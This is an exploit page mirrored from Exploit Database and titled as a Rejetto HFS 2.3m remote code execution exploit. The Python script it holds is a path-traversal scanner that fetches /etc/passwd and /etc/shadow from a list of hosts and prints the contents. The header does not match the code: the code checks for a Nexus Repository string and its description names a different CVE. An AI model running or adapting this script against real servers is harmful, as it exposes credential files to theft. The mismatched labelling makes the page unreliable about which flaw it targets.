Rejetto HTTP File Server 2.3m – Remote Code Execution (RCE)

• Exploit Database
• 13 阅读

• 作者： VeryLazyTech
  日期： 2025-03-28
• 类别：

  • webapps
  平台：

  • typescript
• 来源：https://www.exploit-db.com/exploits/52102/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94

  # Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE) # Fofa Dork: "HttpFileServer" && server=="HFS 2.3m" # Date: 2024-09-22 # Exploit Author: VeryLazyTech # GitHub: https://github.com/verylazytech/CVE-2024-23692 # Vendor Homepage: http://rejetto.com/hfs/ # Software Link: http://rejetto.com/hfs/ # Version: 2.3m # Tested on: Windows 10 # CVE: CVE-2024-23692   import requests import random import argparse from colorama import Fore, Style   green = Fore.GREEN magenta = Fore.MAGENTA cyan = Fore.CYAN mixed = Fore.RED + Fore.BLUE red = Fore.RED blue = Fore.BLUE yellow = Fore.YELLOW white = Fore.WHITE reset = Style.RESET_ALL bold = Style.BRIGHT colors = [green, cyan, blue] random_color = random.choice(colors)     def banner(): banner = f"""{bold}{random_color} ______ _______ ____ ___ ______ __ _______ __ / ___\ \ / / ____| |___ \ / _ \___ \| || | | || | / _ \| ___| / /_ | |\ \ / /|_| __) | | | |__) | || |_| || || (_) |___ \| '_ \ | |___\ V / | |___ / __/| |_| / __/|__ _| |__ _\__, |___) | (_) | \____|\_/|_____| |_____|\___/_____||_||_| /_/|____/ \___/ __ ________ _ \ \ / /__ _ __ _ _| |__ _ _____ _|_ _|_____| |__ \ \ / / _ \ '__| | | | | | / _` |_/ | | | | |/ _ \/ __| '_ \ \ V /__/ || |_| | | |__| (_| |/ /| |_| | | |__/ (__| | | | \_/ \___|_| \__, | |_____\__,_/___|\__, | |_|\___|\___|_| |_| |___/|___/ {bold}{white}@VeryLazyTech - Medium {reset}\n"""   return banner     def read_ip_port_list(file_path): with open(file_path, 'r') as file: lines = file.readlines() return [line.strip() for line in lines]     def make_request(ip_port, url_path): url = f"http://{ip_port}/{url_path}" try: response = requests.get(url, timeout=5) return response.text except requests.RequestException as e: return None     def main(ip_port_list): for ip_port in ip_port_list: for url_path in ["%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/passwd", "%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F../etc/shadow"]: response_text = make_request(ip_port, url_path) if response_text and "nexus:x:200:200:Nexus Repository Manager user:/opt/sonatype/nexus:/bin/false" not in response_text and "Not Found" not in response_text and "400 Bad Request" not in response_text and "root" in response_text: print(f"Address: {ip_port}") print(f"File Contents for passwd:\n{response_text}" if "passwd" in url_path else f"File Contents for shadow:\n{response_text}") break     if __name__ == "__main__": parser = argparse.ArgumentParser(description=f"[{bold}{blue}Description{reset}]: {bold}{white}Vulnerability Detection and Exploitation tool for CVE-2024-4956", usage=argparse.SUPPRESS) group = parser.add_mutually_exclusive_group(required=True) group.add_argument("-u", "--url", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a URL or IP with port for vulnerability detection\n") group.add_argument("-l", "--list", type=str, help=f"[{bold}{blue}INF{reset}]: {bold}{white}Specify a list of URLs or IPs for vulnerability detection\n") args = parser.parse_args()   if args.list: ip_port_list = read_ip_port_list(args.list) print(banner()) main(ip_port_list) elif args.url: ip_port_list = [args.url] print(banner()) main(ip_port_list) else: print(banner()) parser.print_help()